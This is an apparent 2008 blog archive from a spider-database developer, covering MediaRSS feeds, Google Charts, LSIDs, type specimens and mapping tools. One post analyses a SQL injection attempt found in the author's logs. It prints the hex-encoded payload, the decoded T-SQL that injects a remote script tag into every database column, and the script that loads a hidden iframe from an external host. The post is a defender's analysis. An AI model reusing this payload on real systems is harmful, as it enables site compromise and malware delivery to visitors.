Thursday, December 18, 2008

Cooliris on Eight Legs


For well over a year, I have been serving MediaRSS feeds from the Nearctic Spider Database (before Yahoo and Flickr!) and I am overjoyed to see that all the big guys are jumping on this extension to RSS 2.0. One in particular that blows me away is Cooliris, a plug-in for all modern browsers that allows one to navigate MediaRSS feeds in 3D. So, if you haven't yet downloaded and installed Cooliris, you may do so HERE. Then, you're welcome to see the feed of spiders HERE.

Maybe I better take a second look at RSSBus...

Monday, November 3, 2008

Little E's

Because I work for the Encyclopedia of Life (EOL) and because I can tinker on the Nearctic Spider Database, I have the opportunity to try out various approaches to help mobilize data. One thing that concerns me about the current relationship between EOL and its content partners is their near 1:1 relationship. In other words, content partners that come onboard are encouraged to represent their data in one potentially massive XML document much like a Google Sitemap. More information on what EOL would like to see future content partners produce can be found HERE. A potential outside consumer of these data will have no idea where to retrieve this XML document. Thus, the relationship between EOL and its content partners is closed. That is, until EOL releases some web services.

So, in an effort to help expose the data structure EOL is looking for, I made a link on every one of the species pages in the Nearctic Spider Database. Upon clicking these "little e's", you can catch a glimpse of what EOL is hoping its content partners will produce. These "little e's" don't really help the relationship between EOL and its array of content partners, nor does it ease the effort on the part of content partners to make these documents, and nor does it help us at EOL. So what's the point? What it does is share what I produced for EOL. If you can parse the data behind the "little e's", you can parse the big XML "sitemap" document I made for EOL as well.

The problem with sitemaps is that no one but the harvester knows where these sitemaps can be found. A Google sitemap for instance can be found in any folder on a website that shares a sitemap (but is usually in the root folder and is accessed as /sitemap.xml or /sitemap.gz). This is the same situation for EOL and its content partners; the "sitemap" can be found anywhere.

To finish off the "little e" approach, each page should have a link to the EOL content partner sitemap document in which can be found links to all pages with "little e's". This would be somewhat similar to an OpenSearch document where are found instructions on how to make use of the search feed(s) available on a site. And of course, there should be a JSON option for a lighter weight option than XML.

But, to make this of any use at all, we need a desktop reader like an RSS reader...something with the ability to shunt the data into the correct spot within a rich GUI-based classification (with some degree of certainty), thus forcing us to eventually develop far better online tree browsers. With all the bits described above, you'd come across a species page, click a button like an RSS feed button, download a sitemap containing a list of all species pages on the site you landed on, then browse through the content the way you want it organized.

Saturday, October 18, 2008

Google Charts...Wow

Kevin Pfeiffer, an avid participant in the Nearctic Arachnologists' Forum, finally got me to do something about the Flash-based charts on the species pages in the Nearctic Spider Database. While these older charts were great at the time, they've had their day. So, in light of the sparklines that Rod Page integrated into a "Biodiversity Service Status" pinger, I thought I'd take a closer look at Google Charts. Wow. The added plus for this service is the truly stellar documentation.

Rather than using a terribly long URL to get the PNG for the chart, I used a proxy. This way, I can pass the identifier to a local script that then grabs the image and dumps it on the page. And, I can give the chart a file name of my choosing.

Sunday, October 12, 2008

Long Tail of Biodiversity

At last count on the World Spider Catalog, there are 4345 species in the spider family Linyphiidae. This is second only to the jumping spiders. The latter are primarily tropical and subtropical, but linyphiids are predominantly found in the northern hemisphere, where are coincidentally found most of the world's arachnid systematists. And, of course, there's very little accessible information on most of these species either in print or on the web. A few notable exceptions are Tanasevitch's Linypiid Spiders of the World, which contains flat lists of names organized in various ways and the ever popular BugGuide gallery (few of which identified to species). There is a smattering of other resources out there, but they are all hard to find. Both the Tree of Life and the Encyclopedia of Life have the equivalent of stub pages so neither of these are particularly helpful.


A recent unlocking of these hidden gems is underway by Nina Sandlin, an Associate of Zoology at the Field Museum in Chicago. She has been building LinEpig, an photo gallery of linyphiid epigyna on Picasa Web Albums. Like most other online work on arachnids, LinEpig is built with love for the organisms and no budget (correct me if I'm wrong Nina!). While taking images of the epigyna, Nina graciously shared the habitus images with the Nearctic Spider Database. While in Chicago recently, I chatted with Nina about Picasa. While it comes close to what she wanted, it fell short in a number of areas. The most important in my opinion is findability. Sure, she can tag her images with names, but her gallery is poorly exposed on Google and other search engines. However, there are some features in Picasa that make it attractive. It is relatively easy to upload, manage, and geotag - though the latter could evidently use text boxes if one already has coordinates on hand. Most importantly, the interface is clean, responsive and uncluttered.

Now the long tail...

Prior to Nina's efforts, there was very little (if any) linyphiid imagery on the web, especially the specialized images of the epigyna, which are a lot more useful than the habitus images. If you've seen one linyphiid, you've pretty much seen them all (a few exceptions of course). They are remarkably similar in shape & size, but their sexual characters, especially the male's, are dramatically different. The big biodiversity aggregators like the Encyclopedia of Life have positioned themselves to present low hanging fruit. That is, show the furry charismatic megafauna (or fish) because there are many resources serving this sort of content. But, why? Wouldn't it make sense to instead provide better and more useful tools for folks like Nina to create and organize content for which there is either nothing or very little available elsewhere? Let's hope that in time, LifeDesk will provide a ladder for consumers of content generated there to reach out to the furthest branches and leaves where are found all the curiosities. But first, it'll have to contain tools and functionality useful for folks like Nina and for others to jump in and give her a hand.

Friday, July 25, 2008

Show Me...Crab Spiders on Bark



One of the DarwinCore elements for specimen and observation data is "habitat". To my knowledge, not a lot has been done with these data. Either there are actually few records cached at GBIF that have this field filled or the data are in a such a mess as to be (mostly) unusable. I certainly hope it's not the latter. No matter how messy, there is still a wealth of information here if one takes the time to sift through it. The data are not unlike folksonomies and someone with more patience than me could probably develop a natural classification of these terms.

Faceted search is a first crack at making these data useful, because there is certainly more trajectories into the data than without making use of the data. For a first cut at this, I pulled 30 random contributed specimen records in the Nearctic Spider Database for each species and merely display the full contents on the species pages. Then, I index the pages as always using my trusty Zoom Search. Voila, a quick way to do some quick, faceted searches. It's not perfect, but it's better than nothing. Where "crab spider bark" or "wolf spider beach" once produced no search results, there are now 5 and 17 results returned, respectively. Incidentally, Flickr produced 13 and 18 results, respectively but many images are useless.

Sunday, July 20, 2008

Green Porno

I couldn't resist sharing these. Pure genius. Kudos to Isabella Rossellini.

SQL Injection Attacks!

I was browsing through my web logs this morning and discovered some clever attempts to hack into my database using a technique called SQL injection. Here's a portion of one line in the web log:

/data/canada_spiders/AllReferences.asp Letter=F;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C...more crap here...4445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);--

The semicolon after "Letter=F" above is an attempt to mark the close of the SQL within the page "/data/canada_spiders/AllReferences.asp" and everything else after it is crap that could be executed on the server. Had I constructed my SQL on the page to be something like:
SELECT * FROM [TABLE] WHERE [COLUMN] = "" & [LETTER F] & ""

...where [LETTER F] is the parameter passed from the URL, I would have exposed myself to something potentially serious. So, instead of:
SELECT * FROM [TABLE] WHERE [COLUMN] = "F"

...the executed SQL would have been:
SELECT * FROM [TABLE] WHERE [COLUMN] = "F";DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C...more crap here...4445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);--

Cool.

So, just what is all that crap? Well, it's a SQL Server-specific bit of code that is HEX-encoded. The full decoded HEX is as follows:
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN
EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.bnrc.ru/ngg.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

Hmm. What does this mean? Well, it's an attempt to do something very scary - update every cell in every table to include a reference to a snippet of JavaScript. So, the next time any data are pulled from the database for presentation on a website, there is the potential to include hundreds of references to a remote JavaScript file.

So, what's in the JavaScript? This:
window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("dssndd=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+9*3600*1000);
document.cookie = "dssndd=update;expires="+expires.toGMTString();
try{
document.write("<iframe src=http://iogp.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
}
catch(e)
{
};
}

OK, so an iframe is inserted. Cripes, will it ever end? What's in the iframe? A page with some obfuscated JavaScript that loads with the rendering of the page. This is as far as I got. But, others have also discovered this and note that the JavaScript in that iframe is at least a redirect to msn.com. If you conduct a search for "ngg.js", you can pull up a whole heap of sites indexed by Google that have apparently been affected with this SQL injection attack. So, if you visit a web site, click a link and get mysteriously redirected to msn.com, something may have just happened to your browser.

But, I have still not idea what the ultimate end game is. What the heck is in the obfuscated JavaScript in the iframe? Anyone?

Saturday, July 19, 2008

Google Geocodes

Since I have been on a kick this weekend getting back into the mapping thing, I decided to see what was new in the world of the Google Map API and discovered plenty of new great things. For example, folks have developed reverse geocoders. It's a shame however that the full ISO country names aren't used. Rather, only the country codes are made available via Google's geocode API. I would have much rather had the full country name and the full "AdministrativeAreaName" (i.e. the State or Province in Google Map API parlance) because I could then use this in the AJAX data grid for contributors of specimen records to the Nearctic Spider Database. Similarly, applications like Specify could have taken advantage of this to help users clean or check their data as these are entered.

Nevertheless, I tweaked my old Google Map Geocoder to take advantage of all these advancements. The point of this little gadget is to click a map and get the location and coordinates. In this era of GPS units and iPhones, this may be rather pointless. But it was fun to see what I could do in an hour or so.

Friday, July 18, 2008

Simple Mapper

With the recent mapping craze this past decade and the fascination with AJAX tiling, a serious deficiency has been a simple mechanism to produce a black & white line map with points to mark collection locations for use in an outgoing manuscript. While at the recent American Arachnological Society meetings at Berkeley, California, I casually mentioned in a presentation I gave about the Nearctic Spider Database that someone should make such a service. Well, I made one...at least the start of one, right HERE.

I know, I know, yet another mapping service. But, this one serves a very specific purpose. It could no doubt be expanded and made more customizable such as different points for multiple species (a bit tougher) and an option to use a global map instead (trivial), but it's a start to producing something that hopefully satisfies a very different need.

Monday, May 12, 2008

Life Science Identifiers (LSIDs) - Why?

The Catalogue of Life (CoLP) recently released its 2008 checklist and has now implemented Life Science Identifiers (LSIDs). In the past, the Catalogue of Life changed its identifiers with every new version, thus forcing database owners who made use of CoLP names and identifiers to reconstruct their databases if they wished to maintain some sort of external linking to an authoritative source.

If you're not familiar with LSIDs, this from the sourceforge LSID resolution project:

Life Science Identifiers (LSIDs) are persistent, location-independent, resource identifiers for uniquely naming biologically significant resources including species names, concepts, occurrences, genes or proteins, or data objects that encode information about them. To put it simply, LSIDs are a way to identify and locate pieces of biological information on the web.
This is how LSIDs are constructed:


So, what can one do with an LSID? Well, given an LSID, one can get some metadata for that data object. This assumes of course that the authority at the other end is alive and ready to serve the metatdata. There is not a central authority as is the case with Digital Object Identifiers (DOIs) used by the publication industry.

For starters, one can resolve LSIDs using various online resources. Examples:
  1. Biodiversity Information Standards (TWDG): LSID resolver

  2. Rod Page: LSID tester


Because of the distributed nature of LSID authorities (its ultimately based on DNS), there is of course nothing preventing the same taxon name from having multiple identifiers or one authority from serving multiple LSIDs for the same taxon name. For example, the namestring for the fishing spider Dolomedes tenebrosus Hentz, 1844 has no less than 3 LSIDs that resolve to three different authorities:

uBio: urn:lsid:ubio.org:namebank:2072956
Catalogue of Life 2008: urn:lsid:catalogueoflife.org:taxon:f3b7cf14-29c1-102b-9a4a-00304854f820:ac2008 (ugh!)
The World Spider Catalog: urn:lsid:amnh.org:spidersp:019664

The uBio and the Catalogue of Life LSIDs for this spider resolve, but the AMNH LSID is nothing more than a pointer at this stage because at the time of writing does not yet have a functioning resolution service.

Which LSID is a database owner supposed to use? Are LSIDs meant to be currencies that either crumble or presist under Darwinian market pressures? What I want to do is store an LSID in my relational database such that I can more confidently link names with other sources of information such as information about the type specimens, gene sequences, synonyms, specimens etc. The uBio LSID above is nice and compact, but no one but me and uBio would use it. Norm Platnick wasn't aware that uBio had LSIDs for spider names! The World Spider Catalog LSID above is also nice and compact, but it doesn't resolve. The Catalogue of Life LSID is downright awful because I can't merely use the object identification as a stand-alone integer.

So, I'll continue to use "Dolomedes tenebrosus Hentz, 1844" thank you very much. A decentralized identifer system is failing me.

Wednesday, April 16, 2008

Who's Organizing the Type Specimens

Circulating on Taxacom and elsewhere was a note and a petition that has me really worried:

On 26th March 2008 the University Board of Utrecht University, The Netherlands, informed the employees of the Utrecht Herbarium that as of 1 June 2008 the Herbarium is to be closed and, with immediate effect, access to the collections, from national as well as international workers, is to cease.

The above is straight off the Utrecht University website HERE where you can at least sign the online petition.

Where is the real source of this alarming decision? Do administrators see the doors to the herbarium as already closed so it's a simple decision to just bolt them shut?

Tim Robertson (GBIF) has been at the EOL informatics offices these past few days where some interesting ideas have been flying around. One of GBIF's original goals as near as I could remember was to expose the physical location and metadata for type specimens. But, I think a barrier to making this happen was the concentration on a distributed model to harvest and display ALL specimen and observational data in a consistent fashion. These are important sociological considerations but are tangential to the goal. What I would love to see is a simple web page for curators to input their type specimen data. Forget about the distributed data model. Type the data in and get an assigned LSID or some other identifier that can be used in perpetuity. Also type in the citation for the orginial description. Those three bits will serve as the most important scaffolding for all of biology. The metadata schema (if you still think in XML docs) is also laughably easy and the services to be built off this are embarrassingly useful. It is an immense source of pride for institutions (and curators!) to tell the world what type specimens are held behind their walls. Administrators cue in on that.

Tim Robertson and other developers in the Global informatics community are a passionate bunch and can see around corners, recognize the obstacles, and want the projects they represent to be huge successes. So, congrats Tim for your work on mapping and I hope there are other great things to come.

Tuesday, April 15, 2008

Just Gimme the Current Name!

As a graduate student who collected a bunch of names to be stuffed into an Appendix, it was not a trivial task to ensure the names I used were the currently recognized nomenclature. One of the first things a reviewer of any publication containing an Appendix of names will do is check that the names are all correct. In spider circles, that means several dozen trips to Norm Platnick's World Spider Catalog. It would be so much easier for everyone involved if Norm had one big text box in which people could paste all the names and have every name be cross-checked with what is in the Catalog.

Coincidentally, it appears that many people who visit the Nearctic Spider Database use its search box to just get the full name string. I wonder how many searches on Google are the same! So, I made one. Sure, there are programmtic issues. But, I can catch those names that might potentially be ambiguous and tell you about them. I can also tell you if you misspelled a name or if a name you searched on isn't in The Nearctic Spider Database...remember that the database is regionally centric...and someone (me!) has to keep on top of potential species introductions, treatments, etc. because any checklist or database will never be complete.

So, give it a shot:

Wednesday, March 26, 2008

I Got Useful Data...and Caught You Unaware

A recent reply to a post in Taxacom got me thinking more deeply about capturing workflows (see thread):

The 'becomes part of daily routines on the workdesks of experts' is a
crucial part of this 'revolution' - the few experts left need an
incentive to abandon their word processors/spreadsheets/databases and
the incentive would be a workdesk with all the comfort factors that
these software applications give them and a whole heap of bonus
attributes which make it a no-brainer to adopt ... If (big if) the
majority of experts used this workdesk the
adSense-like/referral/ebay-feedback stuff going on in the background
would automatically improve the GBIF (and others - EoL??) content. The
good stuff rises the bad stuff falls - its always been this way, based
on a traditionally published monograph/fauna/flora/mycota/biota
typically on a 10-25 year cycle; in the 21st century digital age it
should be a tad quicker.

Paul


I'm happy to hear people are beginning to think of a "workdesk" as I envision the EOL WorkBench, which coincidentally I am internally calling "LifeDesk". This is how I described it some time ago on Taxacom (here). My thinking has shifted somewhat since then, but the give & take concept still holds.

A few concrete examples:

I modified my twirly, AJAXy reference look-up tool (also present on some exemplar EOL species pages like this one) to actually store the reprint metadata from CrossRef before it gets passed through to the user. The user gets the benefit of knowing there's a reprint available to download - they just click the little icon a second time - and I get the benefit of all the metadata for later use.

In doing some reading and fumbling with Adobe AIR, I stumbled across PhotoSpread (PDF). This app is a clever hybrid between Excel and Flickr. Dragging/dropping images coordinates regroupings or filters. As a consequence, metadata tags are automatically created.

So, while I think a "WorkBench", "WorkDesk", or "LifeDesk" focus for development is in the right direction, we should be looking for shortcuts like these that capture user activity, use third party APIs in the background, and later repurpose the data in other interesting ways. If we are going to parasitize systematists workflows, we best get every ounce of potential data out of the time they consume.

Sunday, March 16, 2008

Where's David?

It has been an exceptionally long time since the last post. But, there were a few life-changing events that took precedence.

For starters, I'm now the WorkBench project leader for the Encyclopedia of Life and am living on Cape Cod with my family.



The Canadian Arachnologist and Spider WebWatch sites are stilled served from a desktop server. But, I have passed the editorial torch for the newsletter to Dr. Robin Leech.

I am also in the midst of buying my first home, which is no end of fun. Banks are quick to take your money, but aren't so quick to give it away, especially if your credit rating is invisible from the other side of an international border.

Just to prove that I have been toying with new things, here's a list containing a taste of things to come with the EOL WorkBench, which by the way I'm pushing for a rename. I'll let you fill in the blanks... ;)~

Drupal
ExtJS
Biblio::Citation::Parser
jQuery multiple autocomplete